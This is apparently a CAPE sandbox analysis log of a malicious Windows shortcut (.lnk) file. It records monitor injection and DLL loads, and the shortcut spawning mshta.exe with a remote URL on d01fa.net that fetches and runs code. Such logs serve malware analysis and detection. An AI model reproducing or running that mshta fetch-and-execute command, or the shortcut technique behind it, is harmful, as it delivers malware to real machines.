Analysis

Category Package Started Completed Duration Log
FILE lnk 2020-05-23 00:17:38 2020-05-23 00:22:55 317 seconds Show Log
2020-05-13 09:08:06,258 [root] INFO: Date set to: 20200523T00:10:53, timeout set to: 200
2020-05-23 00:10:53,062 [root] DEBUG: Starting analyzer from: C:\tmpnwhtwc92
2020-05-23 00:10:53,062 [root] DEBUG: Storing results at: C:\fHYzvOk
2020-05-23 00:10:53,062 [root] DEBUG: Pipe server name: \\.\PIPE\DEsNgeEqDC
2020-05-23 00:10:53,062 [root] DEBUG: Python path: C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32
2020-05-23 00:10:53,062 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-05-23 00:10:53,062 [root] INFO: Automatically selected analysis package "lnk"
2020-05-23 00:10:53,062 [root] DEBUG: Trying to import analysis package "lnk"...
2020-05-23 00:10:53,078 [root] DEBUG: Imported analysis package "lnk".
2020-05-23 00:10:53,078 [root] DEBUG: Trying to initialize analysis package "lnk"...
2020-05-23 00:10:53,078 [root] DEBUG: Initialized analysis package "lnk".
2020-05-23 00:10:53,156 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.browser"...
2020-05-23 00:10:53,156 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser".
2020-05-23 00:10:53,156 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.curtain"...
2020-05-23 00:10:53,187 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain".
2020-05-23 00:10:53,187 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.digisig"...
2020-05-23 00:10:53,218 [root] DEBUG: Imported auxiliary module "modules.auxiliary.digisig".
2020-05-23 00:10:53,218 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.disguise"...
2020-05-23 00:10:53,218 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise".
2020-05-23 00:10:53,218 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.human"...
2020-05-23 00:10:53,234 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human".
2020-05-23 00:10:53,234 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.procmon"...
2020-05-23 00:10:53,234 [root] DEBUG: Imported auxiliary module "modules.auxiliary.procmon".
2020-05-23 00:10:53,234 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.screenshots"...
2020-05-23 00:10:53,234 [modules.auxiliary.screenshots] DEBUG: Importing 'time'
2020-05-23 00:10:53,234 [modules.auxiliary.screenshots] DEBUG: Importing 'StringIO'
2020-05-23 00:10:53,234 [modules.auxiliary.screenshots] DEBUG: Importing 'Thread'
2020-05-23 00:10:53,234 [modules.auxiliary.screenshots] DEBUG: Importing 'Auxiliary'
2020-05-23 00:10:53,234 [modules.auxiliary.screenshots] DEBUG: Importing 'NetlogFile'
2020-05-23 00:10:53,234 [modules.auxiliary.screenshots] DEBUG: Importing 'Screenshot'
2020-05-23 00:10:53,249 [lib.api.screenshot] DEBUG: Importing 'math'
2020-05-23 00:10:53,249 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2020-05-23 00:10:56,218 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2020-05-23 00:10:56,249 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2020-05-23 00:10:56,328 [modules.auxiliary.screenshots] DEBUG: Imports OK
2020-05-23 00:10:56,328 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots".
2020-05-23 00:10:56,328 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.sysmon"...
2020-05-23 00:10:56,328 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon".
2020-05-23 00:10:56,328 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.usage"...
2020-05-23 00:10:56,359 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage".
2020-05-23 00:10:56,359 [root] DEBUG: Trying to initialize auxiliary module "Browser"...
2020-05-23 00:10:56,359 [root] DEBUG: Initialized auxiliary module "Browser".
2020-05-23 00:10:56,359 [root] DEBUG: Trying to start auxiliary module "Browser"...
2020-05-23 00:10:56,359 [root] DEBUG: Started auxiliary module Browser
2020-05-23 00:10:56,359 [root] DEBUG: Trying to initialize auxiliary module "Curtain"...
2020-05-23 00:10:56,359 [root] DEBUG: Initialized auxiliary module "Curtain".
2020-05-23 00:10:56,359 [root] DEBUG: Trying to start auxiliary module "Curtain"...
2020-05-23 00:10:56,359 [root] DEBUG: Started auxiliary module Curtain
2020-05-23 00:10:56,359 [root] DEBUG: Trying to initialize auxiliary module "DigiSig"...
2020-05-23 00:10:56,359 [root] DEBUG: Initialized auxiliary module "DigiSig".
2020-05-23 00:10:56,359 [root] DEBUG: Trying to start auxiliary module "DigiSig"...
2020-05-23 00:10:56,359 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature.
2020-05-23 00:10:57,062 [modules.auxiliary.digisig] DEBUG: File format not recognized.
2020-05-23 00:10:57,062 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-05-23 00:10:57,093 [root] DEBUG: Started auxiliary module DigiSig
2020-05-23 00:10:57,093 [root] DEBUG: Trying to initialize auxiliary module "Disguise"...
2020-05-23 00:10:57,093 [root] DEBUG: Initialized auxiliary module "Disguise".
2020-05-23 00:10:57,093 [root] DEBUG: Trying to start auxiliary module "Disguise"...
2020-05-23 00:10:57,125 [root] DEBUG: Started auxiliary module Disguise
2020-05-23 00:10:57,125 [root] DEBUG: Trying to initialize auxiliary module "Human"...
2020-05-23 00:10:57,125 [root] DEBUG: Initialized auxiliary module "Human".
2020-05-23 00:10:57,125 [root] DEBUG: Trying to start auxiliary module "Human"...
2020-05-23 00:10:57,125 [root] DEBUG: Started auxiliary module Human
2020-05-23 00:10:57,125 [root] DEBUG: Trying to initialize auxiliary module "Procmon"...
2020-05-23 00:10:57,140 [root] DEBUG: Initialized auxiliary module "Procmon".
2020-05-23 00:10:57,140 [root] DEBUG: Trying to start auxiliary module "Procmon"...
2020-05-23 00:10:57,140 [root] DEBUG: Started auxiliary module Procmon
2020-05-23 00:10:57,140 [root] DEBUG: Trying to initialize auxiliary module "Screenshots"...
2020-05-23 00:10:57,140 [root] DEBUG: Initialized auxiliary module "Screenshots".
2020-05-23 00:10:57,140 [root] DEBUG: Trying to start auxiliary module "Screenshots"...
2020-05-23 00:10:57,140 [root] DEBUG: Started auxiliary module Screenshots
2020-05-23 00:10:57,140 [root] DEBUG: Trying to initialize auxiliary module "Sysmon"...
2020-05-23 00:10:57,140 [root] DEBUG: Initialized auxiliary module "Sysmon".
2020-05-23 00:10:57,140 [root] DEBUG: Trying to start auxiliary module "Sysmon"...
2020-05-23 00:10:57,140 [root] DEBUG: Started auxiliary module Sysmon
2020-05-23 00:10:57,140 [root] DEBUG: Trying to initialize auxiliary module "Usage"...
2020-05-23 00:10:57,140 [root] DEBUG: Initialized auxiliary module "Usage".
2020-05-23 00:10:57,140 [root] DEBUG: Trying to start auxiliary module "Usage"...
2020-05-23 00:10:57,140 [root] DEBUG: Started auxiliary module Usage
2020-05-23 00:10:57,140 [root] INFO: Analyzer: Package modules.packages.lnk does not specify a DLL option
2020-05-23 00:10:57,140 [root] INFO: Analyzer: Package modules.packages.lnk does not specify a DLL_64 option
2020-05-23 00:10:57,140 [root] INFO: Analyzer: Package modules.packages.lnk does not specify a loader option
2020-05-23 00:10:57,140 [root] INFO: Analyzer: Package modules.packages.lnk does not specify a loader_64 option
2020-05-23 00:10:57,203 [lib.api.process] INFO: Successfully executed process from path "C:\Windows\system32\cmd.exe" with arguments "/c start /wait "" "C:\Users\Rebecca\AppData\Local\Temp\file.lnk"" with pid 1172
2020-05-23 00:10:57,203 [lib.api.process] INFO: Monitor config for process 1172: C:\tmpnwhtwc92\dll\1172.ini
2020-05-23 00:10:57,203 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpnwhtwc92\dll\dZcaKFD.dll, loader C:\tmpnwhtwc92\bin\yRxBwTv.exe
2020-05-23 00:10:57,312 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\DEsNgeEqDC.
2020-05-23 00:10:57,312 [root] DEBUG: Loader: Injecting process 1172 (thread 5540) with C:\tmpnwhtwc92\dll\dZcaKFD.dll.
2020-05-23 00:10:57,328 [root] DEBUG: Process image base: 0x49E70000
2020-05-23 00:10:57,328 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpnwhtwc92\dll\dZcaKFD.dll.
2020-05-23 00:10:57,328 [root] DEBUG: InjectDllViaIAT: Failed to allocate region in target process for new import table.
2020-05-23 00:10:57,328 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2020-05-23 00:10:57,562 [root] DEBUG: Python path set to 'C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32'.
2020-05-23 00:10:57,562 [root] DEBUG: Dropped file limit defaulting to 100.
2020-05-23 00:10:57,562 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 1172 at 0x69d90000, image base 0x49e70000, stack from 0x293000-0x390000
2020-05-23 00:10:57,578 [root] DEBUG: Commandline: C:\Users\Rebecca\AppData\Local\Temp\"C:\Windows\system32\cmd.exe" \c start \wait "" "C:\Users\Rebecca\AppData\Local\Temp\file.lnk".
2020-05-23 00:10:57,609 [root] INFO: loaded: b'1172'
2020-05-23 00:10:57,609 [root] INFO: Loaded monitor into process with pid 1172
2020-05-23 00:10:57,609 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2020-05-23 00:10:57,609 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2020-05-23 00:10:57,625 [root] DEBUG: Successfully injected DLL C:\tmpnwhtwc92\dll\dZcaKFD.dll.
2020-05-23 00:10:59,625 [lib.api.process] INFO: Successfully resumed process with pid 1172
2020-05-23 00:10:59,687 [root] DEBUG: DLL loaded at 0x753D0000: C:\Windows\system32\SHELL32 (0xc4c000 bytes).
2020-05-23 00:10:59,828 [root] DEBUG: DLL loaded at 0x73DC0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32 (0x19e000 bytes).
2020-05-23 00:10:59,859 [root] DEBUG: DLL loaded at 0x74DB0000: C:\Windows\system32\CRYPTBASE (0xc000 bytes).
2020-05-23 00:10:59,875 [root] DEBUG: DLL loaded at 0x73A50000: C:\Windows\system32\PROPSYS (0xf5000 bytes).
2020-05-23 00:10:59,875 [root] DEBUG: DLL loaded at 0x77020000: C:\Windows\system32\OLEAUT32 (0x91000 bytes).
2020-05-23 00:10:59,906 [root] DEBUG: DLL loaded at 0x76B50000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2020-05-23 00:10:59,906 [root] DEBUG: DLL loaded at 0x73B50000: C:\Windows\system32\ntmarta (0x21000 bytes).
2020-05-23 00:10:59,921 [root] DEBUG: DLL loaded at 0x760D0000: C:\Windows\system32\WLDAP32 (0x45000 bytes).
2020-05-23 00:11:00,109 [root] DEBUG: DLL loaded at 0x74E60000: C:\Windows\system32\profapi (0xb000 bytes).
2020-05-23 00:11:00,312 [root] DEBUG: DLL loaded at 0x74D60000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-05-23 00:11:00,312 [root] DEBUG: DLL loaded at 0x6DF50000: C:\Windows\System32\shdocvw (0x2f000 bytes).
2020-05-23 00:11:00,375 [root] DEBUG: DLL loaded at 0x75230000: C:\Windows\system32\SETUPAPI (0x19d000 bytes).
2020-05-23 00:11:00,375 [root] DEBUG: DLL loaded at 0x74F80000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:00,375 [root] DEBUG: DLL loaded at 0x75020000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:00,390 [root] INFO: Disabling sleep skipping.
2020-05-23 00:11:00,406 [root] DEBUG: DLL unloaded from 0x753D0000.
2020-05-23 00:11:00,812 [root] DEBUG: DLL loaded at 0x6FE50000: C:\PROGRA~1\MICROS~3\Office14\GROOVEEX (0x406000 bytes).
2020-05-23 00:11:00,812 [root] DEBUG: DLL loaded at 0x705D0000: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\MSVCR90 (0xa3000 bytes).
2020-05-23 00:11:00,828 [root] DEBUG: DLL loaded at 0x704C0000: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\MSVCP90 (0x8e000 bytes).
2020-05-23 00:11:00,828 [root] DEBUG: DLL loaded at 0x70460000: C:\Windows\WinSxS\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_51cd0a7abbe4e19b\ATL90 (0x2b000 bytes).
2020-05-23 00:11:00,843 [root] DEBUG: DLL loaded at 0x73940000: C:\Windows\system32\UxTheme (0x40000 bytes).
2020-05-23 00:11:00,843 [root] DEBUG: DLL loaded at 0x74880000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-05-23 00:11:00,875 [root] DEBUG: DLL loaded at 0x74610000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-05-23 00:11:00,875 [root] DEBUG: DLL loaded at 0x6F7E0000: C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf (0x41a000 bytes).
2020-05-23 00:11:00,875 [root] DEBUG: DLL unloaded from 0x6F7E0000.
2020-05-23 00:11:00,875 [root] DEBUG: DLL loaded at 0x6F7E0000: C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf (0x41a000 bytes).
2020-05-23 00:11:00,906 [root] DEBUG: DLL loaded at 0x6DD50000: C:\Windows\system32\LINKINFO (0x9000 bytes).
2020-05-23 00:11:00,921 [root] DEBUG: DLL loaded at 0x6F7E0000: C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf (0x41a000 bytes).
2020-05-23 00:11:00,921 [root] DEBUG: DLL loaded at 0x6F7E0000: C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf (0x41a000 bytes).
2020-05-23 00:11:00,968 [root] DEBUG: DLL loaded at 0x76CE0000: C:\Windows\system32\urlmon (0x124000 bytes).
2020-05-23 00:11:00,968 [root] DEBUG: DLL loaded at 0x74F70000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:00,968 [root] DEBUG: DLL loaded at 0x74FF0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:00,968 [root] DEBUG: DLL loaded at 0x74FE0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2020-05-23 00:11:00,968 [root] DEBUG: DLL loaded at 0x751C0000: C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:00,968 [root] DEBUG: DLL loaded at 0x75010000: C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:00,984 [root] DEBUG: DLL loaded at 0x74330000: C:\Windows\system32\version (0x9000 bytes).
2020-05-23 00:11:00,984 [root] DEBUG: DLL loaded at 0x75000000: C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2020-05-23 00:11:00,984 [root] DEBUG: DLL loaded at 0x76AA0000: C:\Windows\system32\normaliz (0x3000 bytes).
2020-05-23 00:11:00,984 [root] DEBUG: DLL loaded at 0x767A0000: C:\Windows\system32\iertutil (0x215000 bytes).
2020-05-23 00:11:01,015 [root] DEBUG: DLL loaded at 0x76160000: C:\Windows\system32\WININET (0x1c4000 bytes).
2020-05-23 00:11:01,031 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\system32\Secur32 (0x8000 bytes).
2020-05-23 00:11:01,046 [root] DEBUG: DLL loaded at 0x70E20000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2020-05-23 00:11:01,140 [root] INFO: Announced 32-bit process name: mshta.exe pid: 984
2020-05-23 00:11:01,140 [lib.api.process] INFO: Monitor config for process 984: C:\tmpnwhtwc92\dll\984.ini
2020-05-23 00:11:01,171 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpnwhtwc92\dll\dZcaKFD.dll, loader C:\tmpnwhtwc92\bin\yRxBwTv.exe
2020-05-23 00:11:01,187 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\DEsNgeEqDC.
2020-05-23 00:11:01,187 [root] DEBUG: Loader: Injecting process 984 (thread 5460) with C:\tmpnwhtwc92\dll\dZcaKFD.dll.
2020-05-23 00:11:01,187 [root] DEBUG: Process image base: 0x00E70000
2020-05-23 00:11:01,203 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpnwhtwc92\dll\dZcaKFD.dll.
2020-05-23 00:11:01,203 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-05-23 00:11:01,203 [root] DEBUG: Successfully injected DLL C:\tmpnwhtwc92\dll\dZcaKFD.dll.
2020-05-23 00:11:01,218 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 984
2020-05-23 00:11:01,359 [root] INFO: Announced 32-bit process name: mshta.exe pid: 984
2020-05-23 00:11:01,375 [lib.api.process] INFO: Monitor config for process 984: C:\tmpnwhtwc92\dll\984.ini
2020-05-23 00:11:01,375 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpnwhtwc92\dll\dZcaKFD.dll, loader C:\tmpnwhtwc92\bin\yRxBwTv.exe
2020-05-23 00:11:01,390 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\DEsNgeEqDC.
2020-05-23 00:11:01,406 [root] DEBUG: Loader: Injecting process 984 (thread 5460) with C:\tmpnwhtwc92\dll\dZcaKFD.dll.
2020-05-23 00:11:01,406 [root] DEBUG: Process image base: 0x00E70000
2020-05-23 00:11:01,406 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpnwhtwc92\dll\dZcaKFD.dll.
2020-05-23 00:11:01,406 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-05-23 00:11:01,406 [root] DEBUG: Successfully injected DLL C:\tmpnwhtwc92\dll\dZcaKFD.dll.
2020-05-23 00:11:01,421 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 984
2020-05-23 00:11:01,421 [root] DEBUG: DLL loaded at 0x6D2F0000: C:\Windows\system32\sfc (0x3000 bytes).
2020-05-23 00:11:01,421 [root] DEBUG: DLL loaded at 0x69CA0000: C:\Windows\system32\sfc_os (0xd000 bytes).
2020-05-23 00:11:01,687 [root] DEBUG: DLL unloaded from 0x6D2F0000.
2020-05-23 00:11:01,703 [root] DEBUG: DLL unloaded from 0x6FE50000.
2020-05-23 00:11:01,718 [root] DEBUG: Python path set to 'C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32'.
2020-05-23 00:11:01,718 [root] DEBUG: Dropped file limit defaulting to 100.
2020-05-23 00:11:01,734 [root] INFO: Disabling sleep skipping.
2020-05-23 00:11:01,734 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-05-23 00:11:01,734 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 984 at 0x69d90000, image base 0xe70000, stack from 0x206000-0x210000
2020-05-23 00:11:01,734 [root] DEBUG: Commandline: C:\Windows\"C:\Windows\System32\msHta.Exe" http:\www.d01fa.net\images\D817583E\16364\11542\7f1c8663\0387a17.
2020-05-23 00:11:01,734 [root] DEBUG: DLL unloaded from 0x76CE0000.
2020-05-23 00:11:01,750 [root] INFO: loaded: b'984'
2020-05-23 00:11:01,750 [root] INFO: Loaded monitor into process with pid 984
2020-05-23 00:11:01,750 [root] DEBUG: DLL loaded at 0x74DB0000: C:\Windows\System32\CRYPTBASE (0xc000 bytes).
2020-05-23 00:11:01,781 [root] DEBUG: DLL unloaded from 0x753D0000.
2020-05-23 00:11:01,781 [root] DEBUG: DLL unloaded from 0x6DF50000.
2020-05-23 00:11:01,781 [root] DEBUG: DLL unloaded from 0x73A50000.
2020-05-23 00:11:03,312 [root] DEBUG: DLL loaded at 0x66B10000: C:\Windows\System32\mshtml (0x1062000 bytes).
2020-05-23 00:11:03,312 [root] DEBUG: DLL loaded at 0x74FF0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:03,328 [root] DEBUG: DLL loaded at 0x74F70000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:03,328 [root] DEBUG: DLL loaded at 0x76CE0000: C:\Windows\system32\urlmon (0x124000 bytes).
2020-05-23 00:11:03,328 [root] DEBUG: DLL loaded at 0x76160000: C:\Windows\system32\WININET (0x1c4000 bytes).
2020-05-23 00:11:03,359 [root] DEBUG: DLL loaded at 0x76B50000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2020-05-23 00:11:03,359 [root] DEBUG: DLL loaded at 0x77020000: C:\Windows\system32\OLEAUT32 (0x91000 bytes).
2020-05-23 00:11:03,375 [root] DEBUG: DLL loaded at 0x73940000: C:\Windows\System32\UxTheme (0x40000 bytes).
2020-05-23 00:11:03,375 [root] DEBUG: DLL loaded at 0x73DC0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32 (0x19e000 bytes).
2020-05-23 00:11:03,375 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\System32\Secur32 (0x8000 bytes).
2020-05-23 00:11:03,390 [root] DEBUG: DLL loaded at 0x69A90000: C:\Windows\System32\api-ms-win-downlevel-shlwapi-l2-1-0 (0x4000 bytes).
2020-05-23 00:11:03,437 [root] DEBUG: DLL loaded at 0x753D0000: C:\Windows\system32\shell32 (0xc4c000 bytes).
2020-05-23 00:11:03,437 [root] DEBUG: DLL loaded at 0x74E60000: C:\Windows\System32\profapi (0xb000 bytes).
2020-05-23 00:11:03,437 [root] DEBUG: DLL loaded at 0x70E20000: C:\Windows\System32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2020-05-23 00:11:03,468 [root] DEBUG: DLL loaded at 0x76480000: C:\Windows\system32\WS2_32 (0x35000 bytes).
2020-05-23 00:11:03,468 [root] DEBUG: DLL loaded at 0x76120000: C:\Windows\system32\NSI (0x6000 bytes).
2020-05-23 00:11:03,468 [root] DEBUG: DLL loaded at 0x6EB20000: C:\Windows\system32\winhttp (0x58000 bytes).
2020-05-23 00:11:03,515 [root] DEBUG: DLL loaded at 0x6EAA0000: C:\Windows\system32\webio (0x50000 bytes).
2020-05-23 00:11:03,578 [root] DEBUG: DLL loaded at 0x74700000: C:\Windows\System32\DNSAPI (0x44000 bytes).
2020-05-23 00:11:03,578 [root] DEBUG: DLL loaded at 0x70370000: C:\Windows\System32\netprofm (0x5a000 bytes).
2020-05-23 00:11:03,593 [root] DEBUG: DLL loaded at 0x735C0000: C:\Windows\System32\nlaapi (0x10000 bytes).
2020-05-23 00:11:03,593 [root] DEBUG: DLL loaded at 0x730B0000: C:\Windows\System32\dhcpcsvc6 (0xd000 bytes).
2020-05-23 00:11:03,593 [root] DEBUG: DLL loaded at 0x743C0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2020-05-23 00:11:03,609 [root] DEBUG: DLL loaded at 0x73030000: C:\Windows\System32\dhcpcsvc (0x12000 bytes).
2020-05-23 00:11:03,609 [root] DEBUG: DLL loaded at 0x6BBC0000: C:\Windows\System32\ieframe (0xaba000 bytes).
2020-05-23 00:11:03,609 [root] DEBUG: DLL loaded at 0x71BA0000: C:\Windows\System32\api-ms-win-downlevel-shell32-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:03,625 [root] DEBUG: DLL loaded at 0x71530000: C:\Windows\System32\rasadhlp (0x6000 bytes).
2020-05-23 00:11:03,625 [root] DEBUG: DLL loaded at 0x74880000: C:\Windows\System32\CRYPTSP (0x17000 bytes).
2020-05-23 00:11:03,625 [root] DEBUG: DLL loaded at 0x72C90000: C:\Windows\system32\msimtf (0xb000 bytes).
2020-05-23 00:11:03,640 [root] DEBUG: DLL loaded at 0x74610000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-05-23 00:11:03,640 [root] DEBUG: DLL loaded at 0x74E50000: C:\Windows\System32\RpcRtRemote (0xe000 bytes).
2020-05-23 00:11:03,640 [root] DEBUG: DLL loaded at 0x69CB0000: C:\Windows\System32\OLEACC (0x3c000 bytes).
2020-05-23 00:11:03,656 [root] DEBUG: DLL loaded at 0x6D670000: C:\Windows\System32\npmproxy (0x8000 bytes).
2020-05-23 00:11:03,656 [root] DEBUG: DLL loaded at 0x74DC0000: C:\Windows\System32\SXS (0x5f000 bytes).
2020-05-23 00:11:17,921 [root] DEBUG: DLL loaded at 0x6D510000: C:\Windows\System32\msls31 (0x31000 bytes).
2020-05-23 00:11:17,937 [root] DEBUG: DLL loaded at 0x69ED0000: C:\Windows\System32\d2d1 (0x347000 bytes).
2020-05-23 00:11:17,937 [root] DEBUG: DLL loaded at 0x69830000: C:\Windows\System32\DWrite (0x136000 bytes).
2020-05-23 00:11:17,937 [root] DEBUG: DLL loaded at 0x70E40000: C:\Windows\System32\dxgi (0x4c000 bytes).
2020-05-23 00:11:17,953 [root] DEBUG: DLL loaded at 0x734C0000: C:\Windows\System32\dwmapi (0x13000 bytes).
2020-05-23 00:11:17,953 [root] DEBUG: DLL loaded at 0x75230000: C:\Windows\system32\setupapi (0x19d000 bytes).
2020-05-23 00:11:17,968 [root] DEBUG: DLL loaded at 0x74F80000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:17,968 [root] DEBUG: DLL loaded at 0x75020000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:17,968 [root] DEBUG: DLL loaded at 0x74FB0000: C:\Windows\system32\WINTRUST (0x2f000 bytes).
2020-05-23 00:11:17,968 [root] DEBUG: DLL loaded at 0x75040000: C:\Windows\system32\CRYPT32 (0x122000 bytes).
2020-05-23 00:11:17,984 [root] DEBUG: DLL loaded at 0x74ED0000: C:\Windows\system32\MSASN1 (0xc000 bytes).
2020-05-23 00:11:17,984 [root] DEBUG: DLL unloaded from 0x75230000.
2020-05-23 00:11:18,015 [root] DEBUG: DLL loaded at 0x75230000: C:\Windows\system32\setupapi (0x19d000 bytes).
2020-05-23 00:11:18,015 [root] DEBUG: DLL loaded at 0x74F80000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:18,031 [root] DEBUG: DLL loaded at 0x75020000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:18,046 [root] DEBUG: DLL unloaded from 0x751E0000.
2020-05-23 00:11:18,046 [root] DEBUG: DLL loaded at 0x70C90000: C:\Windows\System32\d3d11 (0x175000 bytes).
2020-05-23 00:11:18,062 [root] DEBUG: DLL loaded at 0x689C0000: C:\Windows\System32\D3D10Warp (0x1ea000 bytes).
2020-05-23 00:11:18,078 [root] DEBUG: DLL loaded at 0x75230000: C:\Windows\system32\setupapi (0x19d000 bytes).
2020-05-23 00:11:18,078 [root] DEBUG: DLL loaded at 0x74F80000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:18,078 [root] DEBUG: DLL loaded at 0x75020000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:18,078 [root] DEBUG: DLL unloaded from 0x75230000.
2020-05-23 00:11:18,093 [root] DEBUG: DLL loaded at 0x75230000: C:\Windows\system32\setupapi (0x19d000 bytes).
2020-05-23 00:11:18,093 [root] DEBUG: DLL loaded at 0x74F80000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:18,109 [root] DEBUG: DLL loaded at 0x75020000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:18,125 [root] DEBUG: DLL unloaded from 0x751E0000.
2020-05-23 00:11:18,125 [root] DEBUG: DLL unloaded from 0x689C0000.
2020-05-23 00:11:53,640 [root] DEBUG: DLL unloaded from 0x76640000.
2020-05-23 00:14:19,687 [root] INFO: Analysis timeout hit, terminating analysis.
2020-05-23 00:14:19,687 [lib.api.process] INFO: Terminate event set for process 1172
2020-05-23 00:14:19,687 [root] DEBUG: Terminate Event: Attempting to dump process 1172
2020-05-23 00:14:19,687 [root] DEBUG: DoProcessDump: Dumping Imagebase at 0x49E70000.
2020-05-23 00:14:19,687 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-05-23 00:14:19,703 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x49E70000.
2020-05-23 00:14:19,703 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000829A.
2020-05-23 00:14:19,734 [root] INFO: b'C:\\fHYzvOk\\CAPE\\1172_18783236019142222552020|1172|0;?C:\\Windows\\System32\\cmd.exe;?C:\\Windows\\System32\\cmd.exe;?'
2020-05-23 00:14:19,734 [root] INFO: cape
2020-05-23 00:14:19,734 [root] INFO: ('dump_file', 'C:\\fHYzvOk\\CAPE\\1172_18783236019142222552020', b'0;?C:\\Windows\\System32\\cmd.exe;?C:\\Windows\\System32\\cmd.exe;?', ['1172'], 'procdump')
2020-05-23 00:14:19,781 [root] INFO: ('dump_file', 'C:\\fHYzvOk\\CAPE\\1172_18783236019142222552020', '', False, 'files')
2020-05-23 00:14:19,796 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x49e00.
2020-05-23 00:14:19,796 [lib.api.process] INFO: Termination confirmed for process 1172
